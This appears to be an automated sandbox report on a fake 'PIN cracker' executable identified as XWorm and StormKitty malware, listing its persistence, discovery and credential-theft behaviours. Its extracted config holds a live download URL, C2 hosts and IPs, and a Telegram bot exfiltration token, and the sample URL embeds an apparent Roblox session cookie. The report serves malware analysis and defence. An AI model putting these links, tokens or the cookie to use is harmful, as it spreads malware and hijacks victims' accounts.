stormkitty | hxxps://cdn[.]discordapp[.]com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1[.]03[.]exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING[:]-DO-NOT-SHARE-THIS[.]--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items[.]|_80494648FA815E3F34DE90C838CF07F4E992D60DD39F5ADFFB3590C2E2822FF36758424208C052F528F167A337DEFB238D9E6A3D654E2A68BC7D277CAF7DD1A02FD69CE7D1A741DF654ACAC590A70D64D46005B9C5124C4115BA8681C9936B20C930A12691027B080407C5851E767DF247DB69E4E5A266D671D4B68B0EE28FB9AFF13C4F937A1218C88F437B16EA156D894C1881AF50433E19657FC7F455BFA01E34B532CF18827D3ED0A3EAFCBB7975C3D093A9A4DDD3BDE3F563645FAA5B9093B2C1F4EDD8FA77B2FAB76334F362A937BF6A3D0ADFC14A982B61849E487D283D4507F5A53A4442C5EB6694F69DD091403696B0A7F0181D7430E88098DCF90CCB5793F182D8A85F11F4D1C0B345754C75F3CA7366F094824FA25BBB026C8D012E310804EB0C9F87CE9CEBBFF1B1AE81DB209F378FC57D46F52EC458B4A28699743C00E8836426E55578A1342B20628605753C4AF436A352E338CC483155DCE8DCE9ED53DAC158A3E599B986D2F48254346341C4A5D0D0CFE7AE8F15FEF02F7B2A36A94885579B01990668C0D3B774B53FB6BE2922CDAD9F5F3D1FB9D085C9612004F6948A6D4C349438EEFA3F03A131232F13C799C29F93B745BA6A2A3E2130CBE822E2E7DBEBF6002FFAC23A5444A1B6B6FC8D86DD2E3F2D763EF5C50101EE11C33F2CB31B307C4AEA01C0881ABA1CA165377EBEB705CBD8D5609BED7F2AA59955DDCDBCBDE7EE3FA1067E0419E06FB9694C5357BA1AE08E2CFC359CDD5E8279A3E56FCAE851D67677C0BCE4B64C5E6A9030DFF1B076BADEAA7E3C91518D4111688F3E995837E5BCA643738683C11BACB5728679E1603F229432E61B49DA1AD2E08E82E9803A42BD56A84A4BF94691398DDAA5390CA1BC416E665B63300747D04AC0BDCC423D330260EA4D5F5ED09309F30BAB1D4F402468347090CE9F76FEA7E7366802C2E9ED9E987CFD47F34FE4B227661F4D9481F8AEBC9B056CACF6008D63FA0BB843300644D1E3B08D33242CD29FE9DC6DD67DD72C166083A1F696420F2E14DA4C65A94677E51688214D92D115B39C509E0F0A0E447E462ADB34FAFA2C1A117BC5DD67C3687931AECAE1B74CA2316912

Analysis

max time kernel
297s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-11-2024 14:59

Sharing

Behavioral task

behavioral1

Sample

https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_80494648FA815E3F34DE90C838CF07F4E992D60DD39F5ADFFB3590C2E2822FF36758424208C052F528F167A337DEFB238D9E6A3D654E2A68BC7D277CAF7DD1A02FD69CE7D1A741DF654ACAC590A70D64D46005B9C5124C4115BA8681C9936B20C930A12691027B080407C5851E767DF247DB69E4E5A266D671D4B68B0EE28FB9AFF13C4F937A1218C88F437B16EA156D894C1881AF50433E19657FC7F455BFA01E34B532CF18827D3ED0A3EAFCBB7975C3D093A9A4DDD3BDE3F563645FAA5B9093B2C1F4EDD8FA77B2FAB76334F362A937BF6A3D0ADFC14A982B61849E487D283D4507F5A53A4442C5EB6694F69DD091403696B0A7F0181D7430E88098DCF90CCB5793F182D8A85F11F4D1C0B345754C75F3CA7366F094824FA25BBB026C8D012E310804EB0C9F87CE9CEBBFF1B1AE81DB209F378FC57D46F52EC458B4A28699743C00E8836426E55578A1342B20628605753C4AF436A352E338CC483155DCE8DCE9ED53DAC158A3E599B986D2F48254346341C4A5D0D0CFE7AE8F15FEF02F7B2A36A94885579B01990668C0D3B774B53FB6BE2922CDAD9F5F3D1FB9D085C9612004F6948A6D4C349438EEFA3F03A131232F13C799C29F93B745BA6A2A3E2130CBE822E2E7DBEBF6002FFAC23A5444A1B6B6FC8D86DD2E3F2D763EF5C50101EE11C33F2CB31B307C4AEA01C0881ABA1CA165377EBEB705CBD8D5609BED7F2AA59955DDCDBCBDE7EE3FA1067E0419E06FB9694C5357BA1AE08E2CFC359CDD5E8279A3E56FCAE851D67677C0BCE4B64C5E6A9030DFF1B076BADEAA7E3C91518D4111688F3E995837E5BCA643738683C11BACB5728679E1603F229432E61B49DA1AD2E08E82E9803A42BD56A84A4BF94691398DDAA5390CA1BC416E665B63300747D04AC0BDCC423D330260EA4D5F5ED09309F30BAB1D4F402468347090CE9F76FEA7E7366802C2E9ED9E987CFD47F34FE4B227661F4D9481F8AEBC9B056CACF6008D63FA0BB843300644D1E3B08D33242CD29FE9DC6DD67DD72C166083A1F696420F2E14DA4C65A94677E51688214D92D115B39C509E0F0A0E447E462ADB34FAFA2C1A117BC5DD67C3687931AECAE1B74CA2316912

Resource

win10v2004-20241007-en

windows10-2004-x64

43 signatures

300 seconds

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1305576456365146163/1306629137149988928/XneoPinCrackerV1.03.exe?ex=67375cb6&is=67360b36&hm=e213b19c808dbed2a865b7eb2ffc745892e24be362d0bab5c5319ca07615cfd0& _|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_80494648FA815E3F34DE90C838CF07F4E992D60DD39F5ADFFB3590C2E2822FF36758424208C052F528F167A337DEFB238D9E6A3D654E2A68BC7D277CAF7DD1A02FD69CE7D1A741DF654ACAC590A70D64D46005B9C5124C4115BA8681C9936B20C930A12691027B080407C5851E767DF247DB69E4E5A266D671D4B68B0EE28FB9AFF13C4F937A1218C88F437B16EA156D894C1881AF50433E19657FC7F455BFA01E34B532CF18827D3ED0A3EAFCBB7975C3D093A9A4DDD3BDE3F563645FAA5B9093B2C1F4EDD8FA77B2FAB76334F362A937BF6A3D0ADFC14A982B61849E487D283D4507F5A53A4442C5EB6694F69DD091403696B0A7F0181D7430E88098DCF90CCB5793F182D8A85F11F4D1C0B345754C75F3CA7366F094824FA25BBB026C8D012E310804EB0C9F87CE9CEBBFF1B1AE81DB209F378FC57D46F52EC458B4A28699743C00E8836426E55578A1342B20628605753C4AF436A352E338CC483155DCE8DCE9ED53DAC158A3E599B986D2F48254346341C4A5D0D0CFE7AE8F15FEF02F7B2A36A94885579B01990668C0D3B774B53FB6BE2922CDAD9F5F3D1FB9D085C9612004F6948A6D4C349438EEFA3F03A131232F13C799C29F93B745BA6A2A3E2130CBE822E2E7DBEBF6002FFAC23A5444A1B6B6FC8D86DD2E3F2D763EF5C50101EE11C33F2CB31B307C4AEA01C0881ABA1CA165377EBEB705CBD8D5609BED7F2AA59955DDCDBCBDE7EE3FA1067E0419E06FB9694C5357BA1AE08E2CFC359CDD5E8279A3E56FCAE851D67677C0BCE4B64C5E6A9030DFF1B076BADEAA7E3C91518D4111688F3E995837E5BCA643738683C11BACB5728679E1603F229432E61B49DA1AD2E08E82E9803A42BD56A84A4BF94691398DDAA5390CA1BC416E665B63300747D04AC0BDCC423D330260EA4D5F5ED09309F30BAB1D4F402468347090CE9F76FEA7E7366802C2E9ED9E987CFD47F34FE4B227661F4D9481F8AEBC9B056CACF6008D63FA0BB843300644D1E3B08D33242CD29FE9DC6DD67DD72C166083A1F696420F2E14DA4C65A94677E51688214D92D115B39C509E0F0A0E447E462ADB34FAFA2C1A117BC5DD67C3687931AECAE1B74CA2316912

Score

10^/10

stormkitty xworm collection credential_access defense_evasion discovery execution persistence privilege_escalation rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

dec-mg.gl.at.ply.gg:58334

147.185.221.23:58334

changes-tiny.gl.at.ply.gg:57342

147.185.221.23:57342

person-bedford.gl.at.ply.gg:27900

147.185.221.23:27900

Attributes

Install_directory
%Userprofile%
install_file
USB.exe
telegram
https://api.telegram.org/bot7517837255:AAFFYwsM3RAJTfnCWwagMLHeBQRG-F4UScg/sendMessage?chat_id=7538845070

Signatures

Detect Xworm Payload 8 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023caf-90.dat	family_xworm
behavioral1/memory/2668-100-0x0000000000DC0000-0x0000000000DE2000-memory.dmp	family_xworm
behavioral1/files/0x0007000000023cb1-107.dat	family_xworm
behavioral1/files/0x0007000000023cb3-118.dat	family_xworm
behavioral1/memory/4472-125-0x0000000000260000-0x000000000027E000-memory.dmp	family_xworm
behavioral1/memory/3484-127-0x0000000000D60000-0x0000000000D7E000-memory.dmp	family_xworm
behavioral1/files/0x000400000000074d-379.dat	family_xworm
behavioral1/memory/5304-386-0x0000000000CF0000-0x0000000000D12000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/2668-338-0x000000001D940000-0x000000001DA5E000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5300	powershell.exe
5388	powershell.exe
5468	powershell.exe
4340	powershell.exe
4712	powershell.exe
5868	powershell.exe
5392	powershell.exe
5880	powershell.exe
2696	powershell.exe
5884	powershell.exe
3012	powershell.exe
5764	powershell.exe
2028	powershell.exe
5480	powershell.exe
5212	powershell.exe
5800	powershell.exe
5284	powershell.exe
5824	powershell.exe
64	powershell.exe
4560	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ikpjte.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	XneoPinCrackerV1.03.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	XneoPinCrackerV1.02.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	AAAAAAAAAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	aaaaaaa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	ADSDADW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	lcjnjr.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4424	powershell.exe
4324	cmd.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	ADSDADW.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	lcjnjr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	AAAAAAAAAA.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	AAAAAAAAAA.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system user.lnk	aaaaaaa.exe

Executes dropped EXE 14 IoCs

pid	Process
3344	XneoPinCrackerV1.03.exe
5064	XneoPinCrackerV1.02.exe
2668	aaaaaaa.exe
4472	ADSDADW.exe
3484	AAAAAAAAAA.exe
5204	system user
5304	lcjnjr.exe
2224	uctviy.exe
6112	system user
3948	system user
4020	ikpjte.exe
5896	ikpjte.exe
2976	rar.exe
5004	system user

Loads dropped DLL 17 IoCs

pid	Process
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe
5896	ikpjte.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	ADSDADW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	AAAAAAAAAA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	lcjnjr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system user = "C:\\Users\\Admin\\system user"	aaaaaaa.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com
94	ip-api.com
99	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4908	tasklist.exe
2536	tasklist.exe
2768	tasklist.exe
1032	tasklist.exe
3948	tasklist.exe

UPX packed file 40 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5896-557-0x00007FFB98C30000-0x00007FFB99293000-memory.dmp	upx
behavioral1/memory/5896-558-0x00007FFBB7FB0000-0x00007FFBB7FD7000-memory.dmp	upx
behavioral1/memory/5896-559-0x00007FFBB7FA0000-0x00007FFBB7FAF000-memory.dmp	upx
behavioral1/memory/5896-564-0x00007FFBB7F70000-0x00007FFBB7F9B000-memory.dmp	upx
behavioral1/memory/5896-565-0x00007FFBB7F50000-0x00007FFBB7F69000-memory.dmp	upx
behavioral1/memory/5896-566-0x00007FFBB7F20000-0x00007FFBB7F45000-memory.dmp	upx
behavioral1/memory/5896-567-0x00007FFB9E1B0000-0x00007FFB9E32F000-memory.dmp	upx
behavioral1/memory/5896-568-0x00007FFBB7F00000-0x00007FFBB7F19000-memory.dmp	upx
behavioral1/memory/5896-569-0x00007FFBB7EF0000-0x00007FFBB7EFD000-memory.dmp	upx
behavioral1/memory/5896-570-0x00007FFBB7EB0000-0x00007FFBB7EE4000-memory.dmp	upx
behavioral1/memory/5896-575-0x00007FFBB7FB0000-0x00007FFBB7FD7000-memory.dmp	upx
behavioral1/memory/5896-574-0x00007FFB9D330000-0x00007FFB9D863000-memory.dmp	upx
behavioral1/memory/5896-572-0x00007FFB9E0E0000-0x00007FFB9E1AE000-memory.dmp	upx
behavioral1/memory/5896-571-0x00007FFB98C30000-0x00007FFB99293000-memory.dmp	upx
behavioral1/memory/5896-577-0x00007FFBB7E80000-0x00007FFBB7E8D000-memory.dmp	upx
behavioral1/memory/5896-576-0x00007FFBB7E90000-0x00007FFBB7EA4000-memory.dmp	upx
behavioral1/memory/5896-579-0x00007FFB9E020000-0x00007FFB9E0D3000-memory.dmp	upx
behavioral1/memory/5896-578-0x00007FFBB7F50000-0x00007FFBB7F69000-memory.dmp	upx
behavioral1/memory/5896-609-0x00007FFBB7F20000-0x00007FFBB7F45000-memory.dmp	upx
behavioral1/memory/5896-610-0x00007FFB9E1B0000-0x00007FFB9E32F000-memory.dmp	upx
behavioral1/memory/5896-769-0x00007FFBB7EB0000-0x00007FFBB7EE4000-memory.dmp	upx
behavioral1/memory/5896-770-0x00007FFB9E0E0000-0x00007FFB9E1AE000-memory.dmp	upx
behavioral1/memory/5896-774-0x00007FFB9D330000-0x00007FFB9D863000-memory.dmp	upx
behavioral1/memory/5896-796-0x00007FFB98C30000-0x00007FFB99293000-memory.dmp	upx
behavioral1/memory/5896-802-0x00007FFB9E1B0000-0x00007FFB9E32F000-memory.dmp	upx
behavioral1/memory/5896-825-0x00007FFB9E020000-0x00007FFB9E0D3000-memory.dmp	upx
behavioral1/memory/5896-827-0x00007FFBB7E80000-0x00007FFBB7E8D000-memory.dmp	upx
behavioral1/memory/5896-826-0x00007FFB9D330000-0x00007FFB9D863000-memory.dmp	upx
behavioral1/memory/5896-823-0x00007FFBB7E90000-0x00007FFBB7EA4000-memory.dmp	upx
behavioral1/memory/5896-821-0x00007FFB9E0E0000-0x00007FFB9E1AE000-memory.dmp	upx
behavioral1/memory/5896-820-0x00007FFBB7EB0000-0x00007FFBB7EE4000-memory.dmp	upx
behavioral1/memory/5896-819-0x00007FFBB7EF0000-0x00007FFBB7EFD000-memory.dmp	upx
behavioral1/memory/5896-818-0x00007FFBB7F00000-0x00007FFBB7F19000-memory.dmp	upx
behavioral1/memory/5896-817-0x00007FFB9E1B0000-0x00007FFB9E32F000-memory.dmp	upx
behavioral1/memory/5896-816-0x00007FFBB7F20000-0x00007FFBB7F45000-memory.dmp	upx
behavioral1/memory/5896-815-0x00007FFBB7F50000-0x00007FFBB7F69000-memory.dmp	upx
behavioral1/memory/5896-814-0x00007FFBB7F70000-0x00007FFBB7F9B000-memory.dmp	upx
behavioral1/memory/5896-813-0x00007FFBB7FA0000-0x00007FFBB7FAF000-memory.dmp	upx
behavioral1/memory/5896-812-0x00007FFBB7FB0000-0x00007FFBB7FD7000-memory.dmp	upx
behavioral1/memory/5896-811-0x00007FFB98C30000-0x00007FFB99293000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1300	cmd.exe
5456	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4868	WMIC.exe
1636	WMIC.exe
5456	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4800	systeminfo.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
5088	taskkill.exe
5860	taskkill.exe
5844	taskkill.exe
2896	taskkill.exe
4560	taskkill.exe
3576	taskkill.exe
5664	taskkill.exe
5316	taskkill.exe
4328	taskkill.exe
4568	taskkill.exe
3816	taskkill.exe
368	taskkill.exe
5928	taskkill.exe
2044	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760699918498850"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5352	schtasks.exe
5368	schtasks.exe
5328	schtasks.exe
3132	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 4 IoCs

pid	Process
4472	ADSDADW.exe
2668	aaaaaaa.exe
3484	AAAAAAAAAA.exe
5304	lcjnjr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1892	chrome.exe
1892	chrome.exe
4712	powershell.exe
4712	powershell.exe
3012	powershell.exe
3012	powershell.exe
4712	powershell.exe
4340	powershell.exe
4340	powershell.exe
3012	powershell.exe
4340	powershell.exe
5300	powershell.exe
5300	powershell.exe
5300	powershell.exe
5468	powershell.exe
5468	powershell.exe
5388	powershell.exe
5388	powershell.exe
5468	powershell.exe
5388	powershell.exe
5764	powershell.exe
5764	powershell.exe
5800	powershell.exe
5800	powershell.exe
5764	powershell.exe
5880	powershell.exe
5880	powershell.exe
5880	powershell.exe
5800	powershell.exe
5284	powershell.exe
5284	powershell.exe
5284	powershell.exe
2028	powershell.exe
2028	powershell.exe
2028	powershell.exe
2696	powershell.exe
2696	powershell.exe
2696	powershell.exe
3484	AAAAAAAAAA.exe
3484	AAAAAAAAAA.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe
4472	ADSDADW.exe
4472	ADSDADW.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe
4472	ADSDADW.exe
4472	ADSDADW.exe
4472	ADSDADW.exe
4472	ADSDADW.exe
3484	AAAAAAAAAA.exe
3484	AAAAAAAAAA.exe
3484	AAAAAAAAAA.exe
3484	AAAAAAAAAA.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe
4472	ADSDADW.exe
4472	ADSDADW.exe
3484	AAAAAAAAAA.exe
3484	AAAAAAAAAA.exe
2668	aaaaaaa.exe
2668	aaaaaaa.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1892	chrome.exe
1892	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeDebugPrivilege	2668	aaaaaaa.exe
Token: SeDebugPrivilege	4472	ADSDADW.exe
Token: SeDebugPrivilege	3484	AAAAAAAAAA.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe
Token: SeCreatePagefilePrivilege	1892	chrome.exe
Token: SeShutdownPrivilege	1892	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe
1892	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3484	AAAAAAAAAA.exe
4472	ADSDADW.exe
2668	aaaaaaa.exe
5304	lcjnjr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 3660	1892	chrome.exe	86
PID 1892 wrote to memory of 3660	1892	chrome.exe	86
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
PID 1892 wrote to memory of 4176	1892	chrome.exe	87
